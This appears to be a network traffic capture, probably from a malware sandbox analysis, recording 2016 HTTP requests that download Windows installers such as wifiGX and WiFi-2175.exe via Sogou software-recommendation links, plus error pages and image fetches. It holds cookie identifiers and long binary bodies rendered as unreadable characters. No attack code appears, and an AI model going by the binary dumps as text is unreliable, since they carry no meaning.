!H..3.o.}..$....6I..>.7.7...T2......p...f.S.fWK(....'..(..}.pU...R.
.3....U.0.0.Xl.<..'8xm.%..9-.H..1.....$G\.>~N.BX.L.N.6....|$....
,..#=.\#..s............G&.L_...m..697.....fY.......k.3..>i..U...w..
....../ (mp....NqZ.......Z....&...)...=.8...KhH[.....;...m..lo7...Hyd.
:Ft...#....AB.0.a......q..^.&...^..0.&..K...(.p.Z}.4...CCC...[......St
..C......6.b=.f.i.>..K.....'Q..Y....... g..a.C).U...J-...0h./9.)...
...JR...<2..]. .AE....'.a7.<&.o..B:bE2>......L.~....`.,..9..8
:l$......9.~W...;,9'...4......R2.W....p.3..Q........`Q..].>..^.....
y.....:..n...t1.".D.........R..j`.R.f.Ri.D;...c..?..J. ...G..7|`......
i.....K.q}Q....y.Z.}~l.\...,....6..K>Cn.......E.;....W.y..(..P{-;..
T.`........8:..s....%u..R.......N...x......B..t.f.{.......Dq...O...:..
.w.....A.|Tu.1.(...T..DX.t..........S< ..nL)D..3.=.:..sK...6.8...J.
...%oK....... . t.1..../9.e....?l...n_~..q..s.Y.D`..h.`q._...,...../..
-4.h.........>.$U....o....i..... .. :.R.`.....5.6V../n......K...n..
...1..C........q.q)3.*b&^.\C...A...t.>..%...[...6z...F.......) ....
b^1o........[k.........S-...H.......u^p..5|U\8.*..B.Y...v....G..5..Wnp
k8x.P.[..[.'......7,....#........]9.-.z.KJ.Js.G........o...P..........
<.....(.M.t.*.......T.WW..,.B"H.K.....Y...?k.|L.3....=.X]<..!...
...UI.=...X..].5..1sJ...;.j./.R.<[email protected]|........f.B....~.
..6W........a.b.....s. .o...`> .....qT.;..6.....o.3...R.M}.eO.)....
(h..n).r.......s..X.5....X.OC.VOM..E.>)/.-...!FR]w.).PE^..C.*9<.
a-]k3h..X....(i...Z...c.....8.AP..t,.e...]}c..:.#]i.....l.s...(...
<<< skipped >>>


GET /app/a/10190001/381427456234840 HTTP/1.1
Accept: */*
Referer: hXXp://xz.sogou.com/softRecommend
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: img01.sogoucdn.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: NWS_VCLOUD_ACCESS
Connection: keep-alive
Date: Thu, 19 May 2016 07:13:11 GMT
Cache-Control: max-age=86400
Expires: Fri, 20 May 2016 07:13:11 GMT
Last-Modified: Thu, 19 May 2016 00:17:10 GMT
Content-Type: image/jpeg
Content-Length: 113605
X-Cache-Lookup: Hit From MemCache
ETag: b9ab65e9c989f8d59fab66485d4cc5ca
X-Daa-Tunnel: hop_count=1
X-Cache-Lookup: Hit From Inner Cluster 
.....QExif..MM.*.............................b...........j.(..........
.1.........r.2...........i....................'.......'.Adobe Photosho
p CC (Windows).2015:03:27 14:27:11....................................
...............................................&.(....................
.....................H.......H..........Adobe_CM......Adobe.d.........
......................................................................
..................................................................4...
."................?...................................................
.......................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5
....&D.TdE..t6..U.e.....u..F'...............Vfv........7GWgw..........
..............5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.
T..dEU6te......u..F...............Vfv........'7GWgw.................?.
..AEH1....k...#I.E ..N..c0.%.....X.2.~.h..a....q........@..{>.U...Z
 .u_i..as.=f]Uu.4..W.......$......,...Z][email protected].>....]/>.&.M.
/1..A....E...mt..]k.@,.#C..>.mU..s......$...'..Icdu....qg.. .....9.
L..y...0.&."H.G.|k......eo`:K.Z'.I.Y..//'.-.7:.-.n.L{r8W.V..!gG#..0.0.
.P6t.$.).^..3.... ..s...Te)...*$.%>......`J.*O....>!F.....bJ.R..
...5LX.. x.$..2s..L.....N..J..k.o.^.....4..5".`.w...Z...P]..7 ..5.....
....>..~.w....Y.dc..v.Uw.......o.....;3.ab...v...l...\.......O.6{.|
.."..z.G!..........z...........`.f..Lu.........v.pv. ..G.k..k....V~o.e
....[Pl.....^..eU>.......:......7.....F.rY..UX........}.w.O........
.F.d.x.._..3s...q....._.L~..]/...0.H...r.:.nG.....}7..;_....]..7ed
<<< skipped >>>


HEAD /pc_logo/7638937123950702413.png HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, application/msword, application/vnd.ms-excel, application/vnd.ms-powerpoint, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; {D9D54F49-E51C-445e-92F2-1EE3C2313240})
Host: dl.app.sogou.com
Content-Length: 0
Cache-Control: no-cache
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=


HTTP/1.0 503 Service Unavailable
Server: Cdn Cache Server V2.0
Date: Thu, 19 May 2016 07:13:09 GMT
Content-Type: text/html
Content-Length: 1604
Expires: Thu, 19 May 2016 07:13:09 GMT
X-Cache-Error: ERR_CANNOT_FORWARD 11
Via: 1.0 db79:82 (Cdn Cache Server V2.0)
Connection: close



GET /pc_logo/7638937123950702413.png HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: dl.app.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=


HTTP/1.0 503 Service Unavailable
Server: Cdn Cache Server V2.0
Date: Thu, 19 May 2016 07:13:09 GMT
Content-Type: text/html
Content-Length: 1604
Expires: Thu, 19 May 2016 07:13:09 GMT
X-Cache-Error: ERR_CANNOT_FORWARD 11
Via: 1.0 db79:82 (Cdn Cache Server V2.0)
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "htt
p://VVV.w3.org/TR/html4/loose.dtd">.<HTML><HEAD>.<ME
TA HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=gb2312"> .
<TITLE>......................URL..........</TITLE>.<STY
LE type="text/css"><!--BODY{background-color:#ffffff;font-family
:verdana,sans-serif}PRE{font-family:sans-serif}--></STYLE>.&l
t;/HEAD><BODY>.<H1>....</H1>.<H2>..........
......URL..........</H2>.<HR noshade size="1px">.<P>
.......................URL.......<A HREF="hXXp://dl.app.sogou.com/p
c_logo/7638937123950702413.png">hXXp://dl.app.sogou.com/pc_logo/763
8937123950702413.png</A>.<P>....................<UL>
.<LI>.<STRONG>.Unable to forward this request at this time
..<BR>................................</STRONG>.</UL>
;..<P>.This request could not be forwarded to the origin server 
or to any.parent caches.  The most likely cause for this error is that
:.<UL>.<LI>The cache administrator does not allow this cac
he to make .    direct connections to origin servers, and.<LI>Al
l configured parent caches are currently unreachable..</UL>.<
/P>.<P>......................................................
..................................<UL>.<LI>...............
............................................<LI>................
.................................</UL>.</P>.<P>.
<<< skipped >>>


GET /softdl.360tpcdn.com/wifiGX/wifiGX_2.1.7.5.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: close
Host: 119.84.12.22
Pragma: no-cache
Range: bytes=10090249-
Referer: hXXp://119.84.12.22/softdl.360tpcdn.com/wifiGX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 206 Partial Content
Server: nginx
Date: Thu, 19 May 2016 07:13:40 GMT
Content-Type: application/octet-stream
Content-Length: 1619279
Last-Modified: Wed, 08 Apr 2015 05:54:22 GMT
Connection: close
Content-Range: bytes 10090249-11709527/11709528
.Y.Q..<._C..J..........6V.O!-.G.......TX..!.*..I0..<..W..(v.&...
.M.<..............M4..r....h~..{....{.Ui...(.$..\?I....R..8.L7...'.
w%....h....=..I:'.#(.W..i..4uq....&...^4.\.a2.e}.....i.....3\ ....FGeN
.Up.."..`.....]/..Z...&.w......y...T.6.r..y..`.|.p..p..6o.....k.q.p..$
.).0,.......... l8i.9.Js.N'..@......:.d....**.a....".._9XT.Q....].v5..
..%1..y.V.....v]'.ri6/....T.....UV<.S...*........#u.<..Y.z.1)...
h.........,U.(.Y../.....%c.*.V.V...'Q..X dH.s....z.....x.../.$?f..TTt.
.,......,]cS...-....n...w.?.,.....k.c.)...F..8.o.......x.-..U[.0.?F.b.
.t.|..|..|!)........0@W. ....l.....%c. (........eO..@ ".b.....Gc....{.
..y.*s.XQ..M...;..3<..B....W.....|..2...H`f.".e.t....1.'...]...7W..
-...U.....T.~GFq..,..v...M5.B........~........ Cd.)JR|V8...t...F.U....
.8...b......Y..k..l.]^..r.j..},..R[J.O.([email protected].
.l...\s.-2>....9.........2..F...l.......j.A.i.tXd....[[email protected]., 4.
..s..Is....f%..P.Un....S..$..-,....fBuZ......>....gS....=....i..f.o
...w.PXQ..8-...Nt.a....m...\l.WO.4=_P .H*K..J|.vQ.J.a..QZ.{.../,...4J.
../k... ./i..b).0..H.`^..2....t7.R.`SO.]..b....l....'.>...|.x....".
.U....F". b.h...T.;....I..$$*a....s..lo.4......i|..F........_.....z..?
&.i....=.k..O..I....2g..GX2u.0[d....2.7....Oz............S...tlN@-O...
~..f......=n....B...h..".....>....42'Hd Fw8_Db......z......X....V(G
\a....C.H...../X.5.u?.`..p...h...:8.<G"d......z..W.p.....$...0.[..Q
i.po<u9zg..1...K.S"..\....Cx^.IR.DM.2.J..wS..X^]k.zm......h&:...G.*
([email protected]$...W.J4..*.I.j..F..] 8.]....:....o ....y.&g
<<< skipped >>>


GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=0-
Referer: hXXp://ftp-fj-p2sp.pconline.com.cn/pub/download/201010
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:21 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>....



GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=5852718-5971727
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:40 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>....



GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=5852718-5971727
Referer: hXXp://xiazai.sogou.com/
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:39 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>....



GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=3869205-4570045
Referer: hXXp://xiazai.sogou.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:05 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- The padding to disab
le MSIE's friendly error page -->..<!-- The padding to disable M
SIE's friendly error page -->..<!-- The padding to disable MSIE'
s friendly error page -->..<!-- The padding to disable MSIE's fr
iendly error page -->..<!-- The padding to disable MSIE's friend
ly error page -->..<!-- The padding to disable MSIE's friendly e
rror page -->....



GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=0-
Referer: hXXp://xiazai.sogou.com/
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:09 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>....



GET /softdl.360tpcdn.com/wifiGX/wifiGX_2.1.7.5.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: 119.84.12.22
Pragma: no-cache
Range: bytes=9556963-10176773
Referer: hXXp://119.84.12.22/softdl.360tpcdn.com/wifiGX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 206 Partial Content
Server: nginx
Date: Thu, 19 May 2016 07:13:34 GMT
Content-Type: application/octet-stream
Content-Length: 619811
Last-Modified: Wed, 08 Apr 2015 05:54:22 GMT
Connection: close
Content-Range: bytes 9556963-10176773/11709528
.2.$.._gn..,|i......q?..O...zM...s{.YK.v2..G.BS...?.%q62Z.yf....].6I.P
...6...2......>u...L...a....bI$..MT.4...j..."B...a.{...y.....8..(.b
.]......U=......]...x.;.f."..;......T|..cV$...K.3..m.....=..Zb..q9.]..
I. ..kH.{'m}..i2-..a_?.d./..%.&..\.>[email protected]/.KM.*....
...6.......y..fJ6V .HH0.m"c.."._..._....C.o..u..P}...&...&3.T.z.<.c
...-..z.OV..O..=.1............X....B..~m..')..s.2..f.|k..4....6. "...@
.. ..E.`P'.U...G....x./[email protected].. 9S...e.L..{>..<y........
......BN.em}.l....\.Y....\.. [email protected]..]r......V......:.......
..i0aH8..x..M......z.....*.....j..l.Y..\&.D oe...k.....D....f.e...[.Nd
.xlOK..^..R..|.p..,soD..wY9..{...........2b,..?iB.V.i......x1..z....'.
.ZLw.:...K..4{....L...P*T.D.....#w..0SSfH......_#.!.....l;LrL..^...3Y.
Yk;.......P..`....Ny,.L.Y*..f.:E.q%...m..U../K.{=.,..Z.0jC..J...p3E`..
r.L...K]..Or..Ro...w...$.}....q...3......fA2!.<.L9g.q...0..[./Z....
?f.R .SC.F.[. ..R8pA.)%9........3.b|-.#.h...".o.A.j.&.6...L..)/..8 .-.
.[SssC3*..:..2..w^.Q...^V^ ...k....$..X.L...|../........kyNm.;.#..^...
FB[... .........$;.}....\.......K.,...L.3.8-...S/F........eL..9.#.]xG.
C{.....h..}..... ...Ti.9...\..8...C.O.r..a...)"N..Sc..uU...R.s.....n2.
.4..N3........J.d.2xI).u...}I..:..1!|[email protected]/..QZ.S..
|i.........Q......f3$...p......G.FV...\.....p=..R.2.....us...Y........
....b... 6....z,.*....x.i.M..n.e.2JcX.16.G......r.yD1.FK.:........u..8
W...9..yw....&.x.....I...(.A.p.......z.5.$.Q...bu..1)Wz*.S.].>sG...
..T.J.1..-.../.M|t................i......t.;....n.?._.....U.e.2..9
<<< skipped >>>


GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=8782146-11709527
Referer: hXXp://xiazai.sogou.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:20 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- The padding to disab
le MSIE's friendly error page -->..<!-- The padding to disable M
SIE's friendly error page -->..<!-- The padding to disable MSIE'
s friendly error page -->..<!-- The padding to disable MSIE's fr
iendly error page -->..<!-- The padding to disable MSIE's friend
ly error page -->..<!-- The padding to disable MSIE's friendly e
rror page -->....



GET /softdl.360tpcdn.com/wifiGX/wifiGX_2.1.7.5.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: 119.84.12.22
Pragma: no-cache
Range: bytes=8775092-11578455
Referer: hXXp://119.84.12.22/softdl.360tpcdn.com/wifiGX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 206 Partial Content
Server: nginx
Date: Thu, 19 May 2016 07:13:31 GMT
Content-Type: application/octet-stream
Content-Length: 2803364
Last-Modified: Wed, 08 Apr 2015 05:54:22 GMT
Connection: close
Content-Range: bytes 8775092-11578455/11709528
g.]$...t..H.OpsXJ.3.s.u.....(. .N...`g.!^_......B!..tX...bn.]5s..=....
2.....::....d..mDZ.............a.K'..y7C:a..d.K.K[pB2....>v........
.k..$.h....-...<..L.<...(.....5......&......3KO.egh..G.:aA....=j
...Z..=..h.P.r...]".e}.L....1........,-.V....#..67w..A...../.rc..._...
)@E.Y^.M............*...#....>1*...-V...:.b....6........HAP9.....P.
.....Qu...c...4o..-..|V.<..G....(.:....%.;,d..A.qZv.e..oz.x?M......
."~..? ... =..?(.J.s.....o...X.s-...tp?3E..8........q.;../.......<,
...F..E..(Y.".S.g.....%..P."{......l..........o.....1|.......Wu.D...&.
..,...*...(.|.........C..cv....6=.*..L.....u..Z..).98....T.8#.p..n....
..Q.*..D..*,../.8s.....p8..$..Y.T.weNe.Km....r.....`g.a.))K...........
......R43....HZ........tk/-....<.[..q... S......,6I.......!j...} ..
Y.^._....F7.J.J.e......3.v.wh:..).Gb.........v$9.i/p.^E$J.AV.u..'NC..o
.X.#..F....9.^]{e/%..C^.g6?!.u?Q...TZWq..QE%..?>5._.eK.u..q...b.]..
..-...K....OOWx.c.h...SJ......4 ..}.p...la',V~b.u*:PX...OP.=..........
........R!e. .:./.....r[........5 ..L-..1.i...L..x.x..f=;.Fc...R.3^At.
F [email protected][..XS2.IF.........a. l....R......a.'.].,U.&...iA.r..4.
....../.R....}.~T.-y...-..........xLP>......,[email protected].).AI
.a......4u.o ..6...{........x.5.=......Jgp.%.f*.l{.s..5.Cx.....Y.f.P..
.u .i..?.....#....k.]..o....l.....3T .G.........3l...YeN....B)6......v
Nz.....j.[t.rb#r.......;-.(.bh.t....C.Q...D.H6I.Kth.9).v......../Q}...
.<...j...X.fo.......w6,R.>:..X.......S...eQM......"...'F9L.c....
...:.J.P....mO.w..h.i`........!&....K..am..u....<..........@k.:
<<< skipped >>>


GET /softdl.360tpcdn.com/wifiGX/wifiGX_2.1.7.5.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: 119.84.12.22
Pragma: no-cache
Range: bytes=3168364-5971727
Referer: hXXp://119.84.12.22/softdl.360tpcdn.com/wifiGX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 206 Partial Content
Server: nginx
Date: Thu, 19 May 2016 07:13:31 GMT
Content-Type: application/octet-stream
Content-Length: 2803364
Last-Modified: Wed, 08 Apr 2015 05:54:22 GMT
Connection: close
Content-Range: bytes 3168364-5971727/11709528
pn.........8,...zbhR{)i]...eP.jP8j......cR.....b'....|8"...r.q.Nd(x...
[email protected]..... .z..J....n~zZ.....Np'..o..rN#S.c..x..f...
.0....Z......l.\[email protected]$..^
.tw.....U...P..2.... .])iUR.#..3g/.3...j...).>.....:../.oP...`.-...
[email protected].........?3^?...V.../.....V..y.Q?$....UOF&>/}
....'I.D..&q......C....M. .s.....m..!....rU.0.(....P....4 .A....U.....
Me)8.6N8.Y....Z.{.:.E....Xs5..P......~J..T7...^.'...{.\..~"......r|.~.
s.{....f.$lY.[.......9K.1....r}^.......*........>v......>.....p.
[email protected]'y..wAK5.i.K.*...=.E...U`u.&QS'....w.....{...{..$...Z...
.fL...Nz9....Y.{....w}.7:....o74.8..=t.$H$ &.%.BAg#[email protected].(.C`.
.m.n...\B.-&=.....h.k..m".M....,.. R....z:.;....KS.;.6..j..>..9..T*
 ...=.....`..$.&.2u...gt......).YD.bB.|E.|..... .w....9...dk5_ N..4.t.
.?MW...Zs........J..(.l.k.K2..7'.............5..Eu.....Z.r...o...L.X..
;l.x...l..........![pV...J.#..$.. .J..*'.:[email protected]."..
.[..bYS6..o....;0P.5.0..}...c..P .......[....0=H....)..... ..:.n~.am_.
%.3B...]6.u....]_..C..!..?..c.a.QP...x..?...<..X}.[].....8....../..
..WJ..#ym..........K...x.1.Z........^...w.....H..&-.>.....ht)g^..P.
......H...4.#.L....?.zm.(.I.i9....|......h....s..'...\.XI...H...kz....
._.s$.....n...6WH.e.l...e..y....J}...t.d.....y.CI.^$-.M.. ..^ ....I.~.
..y*]..........G...r.Z.YQ..T.W....c....(iw.k..v.3t1...{.:....>...Zu
ZDF9.d.B..E1..lf.....Tq...K..`[email protected].
[email protected][email protected]..#.
<<< skipped >>>


GET /app/a/10190001/741430117543639 HTTP/1.1
Accept: */*
Referer: hXXp://xz.sogou.com/softRecommend
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: img04.sogoucdn.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: NWS_VCLOUD_ACCESS
Connection: keep-alive
Date: Thu, 19 May 2016 07:13:12 GMT
Cache-Control: max-age=86400
Expires: Fri, 20 May 2016 07:13:12 GMT
Last-Modified: Wed, 18 May 2016 23:18:10 GMT
Content-Type: image/png
Content-Length: 151522
X-Cache-Lookup: Hit From Disktank
ETag: 39932f127e952c35a683cdf6fe90d0a7
X-Daa-Tunnel: hop_count=1
X-Cache-Lookup: Hit From Inner Cluster 
.PNG........IHDR.............2.m&....pHYs................MiCCPPhotosho
p ICC profile..x..SwX...>..e.VB....l.."#[email protected]..
..H....(.gA..Z.U\8.....}z............y.....&...j.9R.<:...OH......H.
. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....
ly|B"......I>..................(G$.@..`U.R,......@"......Y.2G.....v
.X..@`...B,.. 8..C.... L..0...._p..H.......K.3.....w....!..l.Ba.).f.."
...#.H..L.........8?......f.l.....k.o">!.........N..._....p...u.k.[
..V.h..][email protected].<......%b..0..>[email protected].@...
...qanv.R....B1n..#......)..4.\,...X..P"M.y.R.D!......2......w....O.N.
...l.~.....X.v.@~.-......g42y.......@ ...........\...L....D..*.A......
........a.D@.$.<.B........A.T.:.............18....\..p..`........A.
..a!:..b.."......"aH4... ...Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u
@.......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v..
..a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._
.H$....N.!%.2I.IkH.H-.S.>..i.L&..m....... ......O.......:...L..$R..
.J5e?....2B...Q.......:.ZIm.vP/S...4u.%...C..-....igi.h/.t.....E....k.
......w......Hb(.k.{...../.L......T0.2..g...oUX*.*|.....:.V.~...TUsU?.
y..T.U..^V}.FU.P.........U..6..RwR.P.Q_.._...c....F..H.Tc....!..2e.XB.
rV..,k.Mb[...Lv...v/{LSCs.f.f.f..q.......9..J.!...{-.-?-..j.f.~.7.z...
b.r......up.@.,..:m:.u..6.Q....u..>.c.y.........G.m..........704.6.
.l18c...c.k.i........h...h..I.'.&..g.5x.>f.o.b.4.e.k<abi2.......
)..k.f....t...,.......9..k.a........E..J.6.....|...M....V>VyV.V
<<< skipped >>>


GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=8660251-8742323
Referer: hXXp://xiazai.sogou.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:40 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- The padding to disab
le MSIE's friendly error page -->..<!-- The padding to disable M
SIE's friendly error page -->..<!-- The padding to disable MSIE'
s friendly error page -->..<!-- The padding to disable MSIE's fr
iendly error page -->..<!-- The padding to disable MSIE's friend
ly error page -->..<!-- The padding to disable MSIE's friendly e
rror page -->....



GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=1065841-1766681
Referer: hXXp://xiazai.sogou.com/
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:29 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>....



GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=5270887-5971727
Referer: hXXp://112.5.251.215/pub/download/201010
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:32 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- The padding to disab
le MSIE's friendly error page -->..<!-- The padding to disable M
SIE's friendly error page -->..<!-- The padding to disable MSIE'
s friendly error page -->..<!-- The padding to disable MSIE's fr
iendly error page -->..<!-- The padding to disable MSIE's friend
ly error page -->..<!-- The padding to disable MSIE's friendly e
rror page -->....



GET /softdl.360tpcdn.com/wifiGX/wifiGX_2.1.7.5.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: 119.84.12.22
Pragma: no-cache
Range: bytes=7373410-8775091
Referer: hXXp://119.84.12.22/softdl.360tpcdn.com/wifiGX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 206 Partial Content
Server: nginx
Date: Thu, 19 May 2016 07:13:31 GMT
Content-Type: application/octet-stream
Content-Length: 1401682
Last-Modified: Wed, 08 Apr 2015 05:54:22 GMT
Connection: close
Content-Range: bytes 7373410-8775091/11709528
6{...G,4.6.X..........{.9.2.,.w..............X..nS..y..C5.......%...~.
..]..P....!.V... ..S!D........[../.$....d.m..d....8..........?F.%O....
.a.>a...2...K..e..{......Xj...c 6..R...Y>..].7..5..}.8&..b..__Z.
